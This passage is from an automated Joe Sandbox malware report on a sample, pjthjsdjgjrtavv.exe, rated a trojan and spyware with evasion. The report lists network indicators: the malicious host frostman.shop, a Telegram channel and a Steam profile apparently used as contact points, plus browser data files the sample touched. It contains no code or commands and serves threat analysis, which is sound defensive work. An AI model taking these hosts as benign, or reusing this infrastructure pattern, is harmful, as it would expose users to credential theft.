                  chrome.cloudflare-dns.com
                  		162.159.61.3
                  		truefalse
                    		high
                    t.me
                    		149.154.167.99
                    		truefalse
                      		high
                      frostman.shop
                      		116.203.12.114
                      		truetrue
                        		unknown
                        ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                        		94.245.104.56
                        		truefalse
                          		high
                          sb.scorecardresearch.com
                          		18.165.220.110
                          		truefalse
                            		high
                            www.google.com
                            		172.217.21.36
                            		truefalse
                              		high
                              s-part-0035.t-0009.t-msedge.net
                              		13.107.246.63
                              		truefalse
                                		high
                                googlehosted.l.googleusercontent.com
                                		142.250.181.65
                                		truefalse
                                  		high
                                  clients2.googleusercontent.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    bzib.nelreports.net
                                    		unknown
                                    		unknownfalse
                                      		high
                                      assets.msn.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        c.msn.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          ntp.msn.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            api.msn.com
                                            		unknown
                                            		unknownfalse
                                              		high

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              https://steamcommunity.com/profiles/76561199809363512false
                                                		high
                                                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734680552182&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                  		high
                                                  https://t.me/k04aelfalse
                                                    		high
                                                    https://c.msn.com/c.gif?rnd=1734680546567&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=796ea4f60b9c41758e1e1163076781a5&activityId=796ea4f60b9c41758e1e1163076781a5&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=DFA719B7D8764A69A65627E5921512AA&MUID=2FB26BEE4D14683625707EB54C6669DFfalse
                                                      		high
                                                      https://sb.scorecardresearch.com/b2?rn=1734680546567&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2FB26BEE4D14683625707EB54C6669DF&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                        		high
                                                        https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                                          		high
                                                          https://sb.scorecardresearch.com/b?rn=1734680546567&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2FB26BEE4D14683625707EB54C6669DF&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                            		high
                                                            https://frostman.shop/true
                                                              		unknown
                                                              https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crxfalse
                                                                		high
                                                                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734680552185&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                  		high
                                                                  https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734680553042&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                    		high
                                                                    https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734680546564&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                      		high

                                                                      URLs from Memory and Binaries

                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1966618545.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, BA168G.0.drfalse
                                                                        		high
                                                                        https://duckduckgo.com/chrome_newtabpjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1965318188.00000000038CB000.00000004.00000020.00020000.00000000.sdmp, 68Q1DJ.0.dr, YM7G4E.0.dr, Web Data.15.drfalse
                                                                          		high
                                                                          https://c.msn.com/2cc80dabc69f58b6_1.15.drfalse
                                                                            		high
                                                                            https://duckduckgo.com/ac/?q=pjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1965318188.00000000038CB000.00000004.00000020.00020000.00000000.sdmp, 68Q1DJ.0.dr, YM7G4E.0.dr, Web Data.15.drfalse
                                                                              		high
                                                                              https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshorelined3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                		high
                                                                                https://ntp.msn.com/0000003.log0.15.drfalse
                                                                                  		high
                                                                                  https://ntp.msn.com/_defaultQuotaManager.15.drfalse
                                                                                    		high
                                                                                    https://msn.comXIDv10Au_Cookies.16.drfalse
                                                                                      		unknown
                                                                                      https://www.last.fm/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                        		high
                                                                                        https://deff.nelreports.net/api/report?cat=msnReporting and NEL.16.drfalse
                                                                                          		high
                                                                                          https://ntp.msn.cn/edge/ntp2cc80dabc69f58b6_1.15.drfalse
                                                                                            		high
                                                                                            https://sb.scorecardresearch.com/2cc80dabc69f58b6_1.15.drfalse
                                                                                              		high
                                                                                              https://docs.google.com/manifest.json0.15.drfalse
                                                                                                		high
                                                                                                https://www.youtube.comd3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                  		high
                                                                                                  https://www.instagram.comd3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                    		high
                                                                                                    https://web.skype.com/?browsername=edge_canary_shorelined3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                      		high
                                                                                                      https://drive.google.com/manifest.json0.15.drfalse
                                                                                                        		high
                                                                                                        https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                          		high
                                                                                                          https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                            		high
                                                                                                            https://frostman.shop/(pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1342669668.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://frostman.shop/)pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://www.messenger.comd3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                  		high
                                                                                                                  https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedged3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                    		high
                                                                                                                    https://outlook.office.com/mail/compose?isExtension=trued3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                      		high
                                                                                                                      https://unitedstates4.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.15.drfalse
                                                                                                                        		high
                                                                                                                        https://i.y.qq.com/n2/m/index.htmld3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                          		high
                                                                                                                          https://www.deezer.com/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                            		high
                                                                                                                            https://web.telegram.org/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                              		high
                                                                                                                              https://cdnjs.cloudflare.com/ajax/libs/mathjax/offscreendocument_main.js.15.dr, service_worker_bin_prod.js.15.drfalse
                                                                                                                                		high
                                                                                                                                https://drive-daily-2.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                  		high
                                                                                                                                  https://drive-daily-4.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                    		high
                                                                                                                                    https://vibe.naver.com/todayd3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                      		high
                                                                                                                                      https://srtb.msn.com/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                        		high
                                                                                                                                        https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.15.drfalse
                                                                                                                                          		high
                                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=pjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1965318188.00000000038CB000.00000004.00000020.00020000.00000000.sdmp, 68Q1DJ.0.dr, YM7G4E.0.dr, Web Data.15.drfalse
                                                                                                                                            		high
                                                                                                                                            https://t.me/k04aelm0nk3Mozilla/5.0pjthjsdjgjrtavv.exefalse
                                                                                                                                              		high
                                                                                                                                              https://assets.msn.com484a6b6e-c4f6-46bd-8440-eb0f5301b662.tmp.16.dr, 9e0507af-53af-4fdd-9eb3-e9b80c92e238.tmp.16.drfalse
                                                                                                                                                		high
                                                                                                                                                https://www.ecosia.org/newtab/pjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, YM7G4E.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://drive-daily-1.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://excel.new?from=EdgeM365Shorelined3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brpjthjsdjgjrtavv.exe, 00000000.00000002.1967879766.0000000003E85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://drive-daily-5.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.16.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.google.com/chromecontent.js.15.dr, content_new.js.15.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://www.tiktok.com/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://www.msn.com/web-notification-icon-light.png2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0pjthjsdjgjrtavv.exefalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://chromewebstore.google.com/manifest.json.15.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgpjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1966618545.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, BA168G.0.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://drive-preprod.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://srtb.msn.cn/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://chrome.google.com/webstore/manifest.json.15.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://y.music.163.com/m/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://unitedstates2.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.15.drfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://bard.google.com/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://assets.msn.cn/resolver/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://frostman.shop;pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://frostman.shopZMYMpjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://browser.events.data.msn.com/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://t.me/pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.000000000096E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://web.whatsapp.comd3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://t.me/8pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.000000000096E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://web.telegram.orgpjthjsdjgjrtavv.exe, 00000000.00000003.1269724485.00000000009EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://m.kugou.com/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://www.office.comd3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://outlook.live.com/mail/0/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://ntp.msn.com/edge/ntp000003.log0.15.dr, 2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://assets.msn.com/resolver/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://powerpoint.new?from=EdgeM365Shorelined3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=pjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1965318188.00000000038CB000.00000004.00000020.00020000.00000000.sdmp, 68Q1DJ.0.dr, YM7G4E.0.dr, Web Data.15.drfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://frostman.shop/~pjthjsdjgjrtavv.exe, 00000000.00000003.1365749773.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1388738818.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1342669668.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1296559926.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000003.1319720904.00000000009E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                        https://tidal.com/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://ntp.msn.com000003.log6.15.drfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://browser.events.data.msn.cn/2cc80dabc69f58b6_1.15.drfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://gaana.com/d3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://drive-staging.corp.google.com/manifest.json0.15.drfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://outlook.live.com/mail/compose?isExtension=trued3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchpjthjsdjgjrtavv.exe, 00000000.00000002.1964453081.0000000003744000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1965318188.00000000038CB000.00000004.00000020.00020000.00000000.sdmp, 68Q1DJ.0.dr, YM7G4E.0.dr, Web Data.15.drfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=trued3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        https://support.mozilla.org/products/firefoxgro.allpjthjsdjgjrtavv.exe, 00000000.00000002.1967879766.0000000003E85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          https://ntp.msn.com/000003.log0.15.dr, 000003.log3.15.drfalse
                                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                                            https://frostman.shoppjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                              https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startSession_13379154135195885.15.drfalse
                                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                                https://latest.web.skype.com/?browsername=edge_canary_shorelined3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                                  https://ntp.msn.com/ntp.msn.com_defaultQuotaManager.15.drfalse
                                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                                    https://word.new?from=EdgeM365Shorelined3b040d1-7820-42c6-8b98-08a24a2ca151.tmp.15.drfalse
                                                                                                                                                                                                                                                      		high

                                                                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                      23.44.201.19
                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                      		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                      116.203.12.114
                                                                                                                                                                                                                                                      		frostman.shopGermany
                                                                                                                                                                                                                                                      		24940HETZNER-ASDEtrue
                                                                                                                                                                                                                                                      149.154.167.99
                                                                                                                                                                                                                                                      		t.meUnited Kingdom
                                                                                                                                                                                                                                                      		62041TELEGRAMRUfalse
                                                                                                                                                                                                                                                      162.159.61.3
                                                                                                                                                                                                                                                      		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                      172.217.21.36
                                                                                                                                                                                                                                                      		www.google.comUnited States
                                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                      20.110.205.119
                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                      204.79.197.219
                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                      		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                      142.250.181.65
                                                                                                                                                                                                                                                      		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                      172.64.41.3
                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                      20.42.65.90
                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                      18.173.219.113
                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                      		3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                      23.209.72.28
                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                      		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                      239.255.255.250
                                                                                                                                                                                                                                                      		unknownReserved
                                                                                                                                                                                                                                                      		unknownunknownfalse
                                                                                                                                                                                                                                                      18.165.220.110
                                                                                                                                                                                                                                                      		sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                                      		3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                      23.44.201.30
                                                                                                                                                                                                                                                      		unknownUnited States
                                                                                                                                                                                                                                                      		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                                                      Private

                                                                                                                                                                                                                                                      IP
                                                                                                                                                                                                                                                      192.168.2.7
                                                                                                                                                                                                                                                      127.0.0.1

                                                                                                                                                                                                                                                      General Information

                                                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                      Analysis ID:1578710
                                                                                                                                                                                                                                                      Start date and time:2024-12-20 07:30:08 +01:00
                                                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                      Overall analysis duration:0h 5m 56s
                                                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                      Number of analysed new started processes analysed:32
                                                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                                                      Sample name:pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@68/283@24/17
                                                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                                                      • Successful, ratio: 99%
                                                                                                                                                                                                                                                      • Number of executed functions: 66
                                                                                                                                                                                                                                                      • Number of non-executed functions: 36
                                                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.238, 64.233.161.84, 23.32.238.232, 172.217.17.46, 172.217.19.234, 142.250.181.74, 172.217.19.202, 172.217.19.170, 172.217.21.42, 172.217.17.74, 172.217.19.10, 142.250.181.106, 142.250.181.138, 172.217.17.42, 142.250.181.42, 216.58.208.234, 13.107.42.16, 204.79.197.203, 204.79.197.239, 13.107.21.239, 13.107.6.158, 4.231.68.226, 23.32.238.138, 2.19.198.56, 2.16.158.88, 2.16.158.96, 2.16.158.186, 2.16.158.179, 2.16.158.89, 2.16.158.90, 2.16.158.176, 2.16.158.169, 2.16.158.170, 23.32.238.226, 23.32.238.242, 23.32.238.185, 23.32.238.168, 23.32.238.193, 23.32.238.176, 23.32.238.186, 23.32.238.243, 23.32.238.179, 23.32.238.240, 2.16.158.27, 2.16.158.33, 2.16.158.184, 2.16.158.26, 2.16.158.187, 95.100.135.99, 95.100.135.112, 95.100.135.121, 95.100.135.106, 95.100.135.128, 95.100.135.123, 95.100.135.105, 95.100.135.129, 95.100.135.120, 13.74.129.1, 13.107.21.237, 204.79.197.237, 172.165.61.93, 23.193.114.18, 2.16.158.82, 2.16.158.83, 2.16.158.91, 23.1
                                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): prod-agic-us-3.uksouth.cloudapp.azure.com, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, clients2.google.com, e86303.dscx.akamaiedge.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, prod-agic-we-8.westeurope.cloudapp.azure.com, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, mira.config.skype.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, time.windows.com, arc.msn.com,
                                                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
